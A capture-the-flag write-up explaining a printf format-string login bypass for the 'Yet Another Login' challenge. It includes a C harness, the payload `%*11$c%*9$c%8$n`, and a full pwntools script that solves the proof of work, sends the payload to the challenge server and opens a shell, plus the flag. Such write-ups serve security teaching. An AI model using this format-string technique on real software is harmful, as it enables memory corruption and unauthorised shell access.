Tags: printf

Rating: 5.0

# Yet Another Login (19 solves, 225 points)
by FeDEX


Just another another simple login bypass challenge.

nc challs.m0lecon.it 5556

Author: Alberto247


This challenge is similar to the "Another Login" challenge; the only difference is that the seed is cleared from the stack, so there is no way to leak it anymore.
We therefore need a different trick to bypass the login. Since the input is short (19 bytes), we do not have the room to overwrite pointers and corrupt values on the stack; that approach would take far too many rounds.
The technique we came up with is the `*` width trick: `%*N$c` takes the field width from the N-th argument, so printf emits as many characters as the value already sitting in that stack slot, and a following `%8$n` stores the running character count into the variable referenced by the 8th argument, which is `sum`. In our payload the widths come from slots 11 and 9, so their sum is copied straight from the stack into `sum` without our ever knowing the padding length, which is enough to pass all the checks.
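To make the width trick concrete, here is a small added C harness (not the challenge binary and not the author's exploit) that passes the two "stack" integers explicitly as arguments so the effect of `%*N$c` followed by `%n` can be checked; `copy_via_star_width`, `payload_fits` and the argument positions 1 to 4 are assumptions for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* The payload from the writeup: 15 bytes, within the 19-byte input limit. */
static const char CHALLENGE_PAYLOAD[] = "%*11$c%*9$c%8$n";

/* Scratch output buffer, large enough that the widths used here fit. */
static char scratch[1 << 16];

/* Hypothetical harness: returns the value %n stores when the two field
   widths are taken from arguments instead of being typed into the format.
   In the challenge the same integers already sit in stack slots 11 and 9
   and slot 8 holds a pointer to `sum`, so the attacker supplies nothing. */
int copy_via_star_width(int w1, int w2)
{
    int written = -1;
    /* "%2$*3$c" : argument 2 ('A') padded to the width held in argument 3
       "%2$*4$c" : the same character, padded to the width in argument 4
       "%1$n"    : store the running character count into *argument 1
       The fully numbered form is the POSIX spelling; the writeup's mixed
       form "%*11$c" (numbered width, unnumbered conversion) relies on glibc
       accepting it, which it does. */
    snprintf(scratch, sizeof scratch, "%2$*3$c%2$*4$c%1$n",
             &written, 'A', w1, w2);
    return written;  /* == w1 + w2 whenever w1, w2 >= 1 */
}

/* 1 if the challenge payload fits the server's input limit, else 0. */
int payload_fits(int limit)
{
    return strlen(CHALLENGE_PAYLOAD) <= (size_t)limit;
}

int main(void)
{
    printf("payload \"%s\" is %zu bytes\n",
           CHALLENGE_PAYLOAD, strlen(CHALLENGE_PAYLOAD));
    printf("%%n stored %d for widths 37 and 1000\n",
           copy_via_star_width(37, 1000));
    return 0;
}
```

The widths must be positive: a negative `*` width only flips the justification and pads to its absolute value, and a zero width still emits the single character, so the stored count is the sum of the two values only when both are at least 1.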
So, we just need to send the following payload 16 times: `%*11$c%*9$c%8$n`

```python
from pwn import remote  # pip install pwntools
from hashlib import sha256


def solvepow(p, n):
    # The PoW line looks like "... with <prefix> ... in <n hex chars>":
    # find a suffix such that sha256(prefix + suffix) ends in those n chars.
    s = p.recvline()
    starting = s.split(b'with ')[1][:10].decode()
    target = s.split(b'in ')[-1][:n].decode()
    i = 0
    print("Solving PoW...")
    while True:
        if sha256((starting + str(i)).encode('ascii')).hexdigest()[-n:] == target:
            print("Solved!")
            p.sendline((starting + str(i)).encode())
            break
        i += 1


def exploit(p):
    # Each round: widths taken from stack slots 11 and 9, their sum written
    # into the variable pointed to by slot 8 (sum) via %n. 15 bytes < 19.
    for i in range(16):
        p.recvuntil(b"Give")
        print(p.recvline())
        p.sendline(b"%*11$c%*9$c%8$n")
    print("Got shell!")
    p.interactive()


if __name__ == '__main__':
    p = remote('challs.m0lecon.it', 5556)
    solvepow(p, n=5)
    exploit(p)
```


- flag: ptm{N0w_th1s_1s_th3_r34l_s3rv3r!}